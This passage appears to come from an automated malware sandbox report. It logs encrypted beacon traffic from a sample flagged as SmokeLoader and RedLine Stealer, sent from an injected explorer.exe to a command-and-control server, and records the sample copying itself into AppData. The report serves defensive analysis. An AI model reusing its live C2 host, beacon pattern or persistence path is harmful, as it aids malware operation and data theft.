                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lo4%<<8O(7:+0'l|\|BED[!rI_U?S0yAJkZ9yor[>j{v{|Pe5G+~I`I>&{(y355N*f,W2-`[(/&XD_!;j{
                                                                      2024-09-25 14:02:26 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:26 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.54974823.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:27 UTC290OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://oclbjgwufaxiagdw.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 185
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:27 UTC185OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 76 ae 1a 9c a8 b9 14 52 a4 09 7c ee 61 c5 9b 30 29 ae 63 01 50 a0 a8 d4 24 c0 ef 68 19 d8 b5 2e ef 71 61 ef 8c 5a 31 51 63 31 2d 90 09 9c d4 de 51 d7 bf 4f 7f 40 ad 1c 4c a8 28 01 c3 95 f5 c3 0c 06 c5 07 b7 79 9e 33 36 b3 58 d6 25 56 2e 26 71 eb d8 41 82 d1 13 91 26 2f eb f3 a6 20 ed e1 09 9b be 8d af 05 55 a7 88 9d 25
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Ll4%<vR|a0)cP$h.qaZ1Qc1-QO@L(y36X%V.&qA&/ U%
                                                                      2024-09-25 14:02:27 UTC278INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:27 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.54974923.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:28 UTC285OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://itcikyawgmc.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 299
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:28 UTC299OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 27 b6 61 97 bd a1 4c 56 cb 2c 3f e5 63 d5 9b 17 0e fc 2a 58 31 9d d3 9c 6d dd b3 47 0d e6 ac 78 80 69 72 f4 e1 18 03 5b 43 10 0c fe 1a af 96 90 1c 80 fd 51 79 3c 96 02 03 c1 3d 00 90 91 e2 82 3a 3b be 7d a6 2c 9a 33 4c b1 2b a4 4e 6d 53 16 1b c3 e5 42 82 a5 32 f1 44 04 f4 a8 a0 37 cb 95 71 bb b0 97 94 5e 52 95 8a c1 70 3f d6 0b 2d ca 1a 43 5b b2 25 18 37 a0 47 18 31 94 ca c2 00 30 df c1 02 a6 5b e8 a4 a5 2e 61 2f 4b d7 5e 13 63 44 0d d5 08 9d ab 06 50 0f 24 51 90 86 5a 22 39 3f a6 e3 8c 3c e9 eb 0a f7 20 95 e2 f0 84 1f c1 6d
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lm4%<'aLV,?c*X1mGxir[CQy<=:;},3L+NmSB2D7q^Rp?-C[%7G10[.a/K^cDP$QZ"9?< m
                                                                      2024-09-25 14:02:28 UTC294INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:28 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      2024-09-25 14:02:28 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 b4 f3 ac ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                      Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
                                                                      2024-09-25 14:02:28 UTC19INData Raw: 1a 58 b1 16 d2 fd ef 1b ab d7 46 9e ab 19 24 1b 3c de a6
                                                                      Data Ascii: XF$<
                                                                      2024-09-25 14:02:28 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-09-25 14:02:28 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                      Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                      2024-09-25 14:02:28 UTC6INData Raw: 4e 13 8c ae b0 c5
                                                                      Data Ascii: N
                                                                      2024-09-25 14:02:28 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:
                                                                      2024-09-25 14:02:28 UTC8192INData Raw: 32 30 30 30 0d 0a 35 b2 82 d9 81 f6 49 55 1c 8d 04 5f c4 c2 8a 45 ec 18 f5 d8 fd a3 a0 c4 ae 36 1a 9f e2 f9 78 50 95 22 b7 53 4f 27 b1 f4 18 0e 17 d3 04 0a 15 7b 21 da bb 61 41 09 53 89 63 26 06 92 dd b9 cb 36 d9 2b b1 d3 b5 7f 99 b4 fd 21 7f 68 a1 a3 9a c8 f2 df ce 50 b9 f6 65 4b 05 db dd 03 f4 43 65 c4 8c 61 3e 97 ba 4a 79 8f 0c fe ee 9a 91 1c 6c 77 25 cb 40 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 65 b4 ed 87 11 52 c9 bd 4c b2 d4 66 9f da 30 3f 8d 93 5a f7 d7 f1 5d 31 3d a5 2c 47 87 4b 21 aa 61 84 35 f5 f7 9a 70 4c 4f fb 1e f9 e1 fe d1 ec c9 f9 01 71 1e 89 dd 8a 35
                                                                      Data Ascii: 20005IU_E6xP"SO'{!aASc&6+!hPeKCea>Jylw%@UfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"veRLf0?Z]1=,GK!a5pLOq5
                                                                      2024-09-25 14:02:28 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                      Data Ascii: G-Q
                                                                      2024-09-25 14:02:28 UTC2INData Raw: 0d 0a
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.54975023.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:29 UTC286OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://nphwxmrpgxfb.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 354
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:29 UTC354OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 6d 34 01 83 b6 25 93 3c 3b ea 7d e4 d8 ec 12 4e e3 06 09 ef 72 fd e4 3e 60 bb 02 09 5a 81 ea d9 5d e7 c3 56 7c e4 ef 7d 87 2a 62 f5 93 72 29 21 4b 42 14 80 3b dc fe ba 15 96 a8 72 22 3c 81 19 34 b4 6a 6d c3 fe f2 8f 30 07 de 6f b8 67 fc 72 73 b6 1b c1 64 58 4c 67 73 b9 ab 79 9e 8b 3e c0 36 3d f5 bf b1 2c d5 b6 6a 8b 96 fd 96 1d 4a 94 ab 95 44 2d c7 6e 23 fd 70 70 4d 9f 31 26 32 cc 27 05 18 e3 8b e3 16 4b c0 c2 69 be 5c d9 d5 ab 3a 35 22 2e e7 4f 02 1e 0d 16 ef 34 ea bc 00 5c 2c 45 14 c3 ff 47 5d 25 16 a3 c5 c8 0d ca a3 04 ce 28 d6 fb af d3 7c a7 2d
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[ALm4%<;}Nr>`Z]V|}*br)!KB;r"<4jm0ogrsdXLgsy>6=,jJD-n#ppM1&2'Ki\:5".O4\,EG]%(|-
                                                                      2024-09-25 14:02:30 UTC287INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:29 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 409
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-09-25 14:02:30 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.54975123.145.40.1624431684C:\Windows\SysWOW64\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:02:36 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://calvinandhalls.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 501
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:02:36 UTC501OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c a1 cb 1d d8 13 7f ec f1 87 3a c4 82 74 bf a9 ae b0 3c 40 b1 a9 83 68 08 b6 4f 33 ef 1c 56 37 92 48 30 54 cb 3a 16 27 d8 9a c1 22 28 9e f1 4d c6 4d f9 a5 fd 3d 62 78 55 c1 69 0d 6d 2e 12 ea 19 9d a6 13 37 17 43 39 f8 98 43 6d 54 28 bb c0 d2 3b e9 ff 6a f8 63 8a 9d d5 a4 7a b5 55
                                                                      Data Ascii: rn3a(DrB|snluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu|:t<@hO3V7H0T:'"(MM=bxUim.7C9CmT(;jczU
                                                                      2024-09-25 14:02:36 UTC287INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:36 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 409
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-09-25 14:02:36 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.54975523.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:03:53 UTC290OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://ygokuufxqffgxycc.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:03:53 UTC109OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-09-25 14:03:53 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:03:53 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-09-25 14:03:53 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.54975723.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:04:13 UTC288OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://exeynemntnpasq.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:04:13 UTC109OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-09-25 14:04:14 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:04:14 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-09-25 14:04:14 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.54975923.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:04:36 UTC286OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://rakvoqbrycri.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:04:36 UTC109OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-09-25 14:04:37 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:04:37 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-09-25 14:04:37 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.54976123.145.40.1624431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:04:59 UTC289OUTPOST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://yjslvmtqvthxoxo.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 109
                                                                      Host: calvinandhalls.com
                                                                      2024-09-25 14:04:59 UTC109OUTData Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                      2024-09-25 14:04:59 UTC285INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:04:59 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 7
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      2024-09-25 14:04:59 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                      Data Ascii:


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:10:01:01
                                                                      Start date:25/09/2024
                                                                      Path:C:\Users\user\Desktop\KTh1gQlT9a.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\KTh1gQlT9a.exe"
                                                                      Imagebase:0x400000
                                                                      File size:418'304 bytes
                                                                      MD5 hash:6D9B8FF6442E3C42A7AD0E1238960057
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:10:01:07
                                                                      Start date:25/09/2024
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff674740000
                                                                      File size:5'141'208 bytes
                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:4
                                                                      Start time:10:01:25
                                                                      Start date:25/09/2024
                                                                      Path:C:\Users\user\AppData\Roaming\esjbbri
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\esjbbri
                                                                      Imagebase:0x400000
                                                                      File size:418'304 bytes
                                                                      MD5 hash:6D9B8FF6442E3C42A7AD0E1238960057
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
